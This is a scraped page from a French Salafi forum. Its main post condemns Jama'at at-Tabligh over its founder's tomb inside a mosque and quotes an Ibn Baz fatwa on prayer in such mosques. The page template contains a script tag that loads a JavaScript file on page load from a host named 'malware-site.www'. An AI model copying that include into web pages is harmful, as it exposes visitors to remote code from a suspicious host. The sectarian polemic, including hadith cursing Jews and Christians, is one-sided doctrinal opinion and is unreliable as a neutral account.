ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Sam 28 Nov - 13:28 par assalafia

http://nashr.qurancomplex.gov.sa/download/Al_Madinah_Mushaf_Win_Setup_15-4-2015.rar

Juillet 2017

LunMarMerJeuVenSamDim
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendrier Calendrier


    La Tombe du fondateur de Jama’at at-Tabligh à l’intérieur de leur Mosquée

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    La Tombe du fondateur de Jama’at at-Tabligh à l’intérieur de leur Mosquée

    Message par assalafia le Mar 14 Oct - 13:23

    Surprised 
     
     
     
     

     
     
     
    Mohammed Ilyas al-Kendahlawi (mort en 1364H (1945)) est le fondateur de la Jamaat at-Tabligh. Il était un Deobandi, soufi, une personne de l’innovation qui a inventé cette nouvelle secte dans les années 1920. Les Tablighis le vénéraient tellement qu’ils ont mis sa tombe dans leur mosquée, Nizam ad-Din en Inde. Téléchargez ce PDF pour voir les images de sa tombe dans la mosquée: ici
    Remarque: Il n’est pas permis d’utiliser la tombe du Prophète Mohammed (صلى الله عليه و سلم) comme  preuve pour montrer qu’une tombe peut être placée dans la Mosquée, pour les raisons suivantes:
    1. Le Prophète (صلى الله عليه و سلم) est mort dans l’appartement de Aicha (Radhi Allahou ‘anha) et il y a été enterré comme le prouvent les ahadith et le consensus des Savants anciens et contemporains. Plus tard, quand Abou Bakr et Omar (radhi Allahou ‘anhouma) sont morts, ils y ont été aussi enterré.
    2. L’appartement de Aicha n’était pas, et n’est toujours pas considéré comme une partie du Masjid du Prophète à Médine. Ceux qui prétendent que les appartements des femmes du Prophète (صلى الله عليه و سلم) faisaient partie du Masjid sont trompés et ignorants. Le Prophète se coucha avec ses épouses dans ces logements et a fait ce que les couples mariés font, et cela n’est pas autorisé dans le Masjid.
    3. Le Masjid du Prophète a ensuite été agrandi, et a encerclé l’appartement de Aïcha (radhi Allahou ‘anha) mais il n’a pas été considéré comme étant l’intérieur du Masjid, comme Ibn Al-Qayyim (d.752H) l’a mentionné dans son « Nooniyah », en outre détaillé par Sheikh al-Fawzan. Les Savants ont déclaré que les murs autour de son appartement sont une ligne de démarcation entre sa tombe et le Masjid.

    Question:
    J’ai voyagé en Inde et au Pakistan avec la Jama’at Tabligh, et nous nous sommes recueillis et avons priés dans des Mosquées qui avaient des tombes en leur sein. Et j’ai entendu dire que la prière dans une mosquée qui contient une tombe est invalidée; donc quelle est votre opinion en ce qui concerne mes prières et dois-je les refaire? Et quel est le jugement sur ​​le fait de sortir avec eux (Jama’at Tabligh) vers ces endroits?
     
    Réponse de l’Imam Ibn Baz:
    Au nom d’Allah, et toutes les louanges sont à Allah, ensuite;
    Jama’at Tabligh n’ont pas avec eux la science perspicace dans les questions de ‘aqidah, donc il n’est pas permis de sortir avec eux, sauf pour celui qui a avec lui de la science et une Aqidah correcte, celle sur laquelle sont Ahlous Sounnah wal Jama’ah, pour qu’il les guide, les conseille et coopère avec eux sur le bien, car ils sont très actifs dans leur travail, mais ils ont besoin de plus de science, et (besoin de) ceux qui leur donneront la clairvoyance des savants du Tawhid et de la Sounnah. Puisse Allah accorder à toutes les personnes de comprendre la Religion et de rester ferme dessus. Quant à la prière dans des Mosquées qui contiennent une tombe en leur sein, cela n’est pas correct, et il est obligatoire de refaire ce que vous y avez prié en elles, en raison de la parole du Prophète(صلى الله عليه و سلم):
    لعن الله اليهود والنصارى اتخذوا قبور أنبيائهم مساجد
    « Que la malédiction d’Allah soit sur les juifs et les chrétiens, ils ont pris les tombes de leurs prophètes comme lieux de culte ».
    Ainsi que sa (صلى الله عليه و سلم) parole:
    ألا و إن من كان قبلكم كانوا يتخذون قبور أنبياهم وصالحيهم مساجد، ألا فلا تتخذوا القبور مساجد فإِني أنهاكم عن ذلك
    « Ceux qui était là avant vous utilisent les tombes de leurs prophètes et des pieux comme lieux de culte, donc ne prenez pas les tombes comme lieux de culte, parce que, car je vous interdis cela.  » [Sahih Muslim]
    Et les textes sur ce sujet sont nombreux.
    Et le succès est auprès d’Allah, et que la paix et les bénédictions d’Allah soient sur ​​notre Prophète Mohammad, sur sa famille et ses Compagnons.
    مجموع فتاوى و مقالات متنوّعة, Volume.8, Page,331

      La date/heure actuelle est Ven 28 Juil - 7:46